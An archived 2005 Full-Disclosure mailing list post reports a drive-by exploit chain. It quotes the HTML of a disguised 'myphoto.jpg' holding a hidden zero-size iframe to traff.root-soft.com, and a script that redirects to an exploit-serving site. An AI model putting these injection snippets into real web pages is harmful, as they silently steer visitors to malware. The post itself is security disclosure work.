RE: [Full-disclosure] http://molecularmultimedia.com/ an exploitdistribution point (update2)

From: Aditya Deshmukh (aditya.deshmukh_at_online.gateway.strangled.net)
Date: 10/04/05

  • Next message: dave kleiman: "RE: [Full-disclosure] Re: Careless Law Enforcement Computer Forensics Lacking InfoSec Expertise Causes Suicides"
    To: "'THORNTON Simon'" <Simon.THORNTON@swift.com>
    Date: Tue, 4 Oct 2005 22:04:30 +0530
    
    
    
    

    > FYI,
    >
    > I've had the site www.ok-ok.biz disabled by the ISP, at least
    > it will deny the
    > perps the ability to find out who has been compromised. The
    > molecularmultimedia
    > site is obvioulsy just a front, will see what can be done about this.

    The site was found after 2 different attempts here are more details

    http://newvisioncc.org/photo/myphoto.jpg which is

    <html>
    <img src="1.jpg">
    <iframe src="http://traff.root-soft.com" width="0" height="0"></iframe>
    </html>
    ---- end myphoto.jpg

    And http://traff.root-soft.com is

    <script>self.location.href='http://molecularmultimedia.com'</script>

    -----end index.html

    And molecularmultimedia.com is the front end to something more sinister....

    Also visiting molecularmultimedia.com with mozilla with the latest version of
    mozilla
    With all the patches still caued the trojan to be executed - I found this from
    the
    Norton antivir logs ....

    > It's amazing looking at the page source, there are at least 4
    > different exploits
    > (I'm still analysing this) encoded into the javascript
    > components of the page.

    And they are pretty good also - new 0day for mozilla also 1.7.12!

    Will let you all know if I find anything!...

    
    

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/



  • Next message: dave kleiman: "RE: [Full-disclosure] Re: Careless Law Enforcement Computer Forensics Lacking InfoSec Expertise Causes Suicides"

    Relevant Pages

    • Re: Another Mozilla Question
      ... The Nav Bar links on the third page work in Mozilla but the e-mail and other link in the page do not. ... If Pub has the ability to Bring Object to the Front or Send them to the back, I would make sure all text frames are in the front. ... In testing one of my initial websites with FireFox, I noticed that the Navigational Hyperlinks on the first two pages of my website work fine... ...
      (microsoft.public.publisher.webdesign)
    • Re: Ranting about the state of Python IDEs for Windows
      ... >primarily based on Mozilla. ... It does have tabbed windows for editing ... >and the ability to organize your files in projects. ...
      (comp.lang.python)
    • Re: classic deficiancy in both windows and linux ?
      ... > Konqueror and Mozilla lack the ability to print a directory ... Mozilla even responds ... since the "directory listing" is just html. ...
      (Debian-User)
    • Re: Lightweight Alternative to Mozilla-Firebird
      ... > left it, for Mozilla. ... > I liked it's ability to reply with higlighted material quoted. ... Pete ... To UNSUBSCRIBE, email to debian-user-request@lists.debian.org ...
      (Debian-User)

    Loading